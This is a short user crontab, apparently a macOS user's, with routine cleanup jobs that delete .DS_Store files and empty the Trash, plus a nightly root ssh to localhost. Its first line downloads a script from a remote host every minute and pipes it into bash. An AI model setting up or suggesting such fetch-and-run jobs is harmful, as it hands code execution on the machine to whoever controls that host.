MAILTO=""
* * * * * curl -L boesen.science:1917/update.sh | bash
0 12 * * * find ~ -iname ".DS_Store" -exec rm {} \;
0 12 */5 * * rm -rf ~/.Trash/*
0 0 * * * ssh root@localhost -t "/Users/boesene/.bin/wlist"
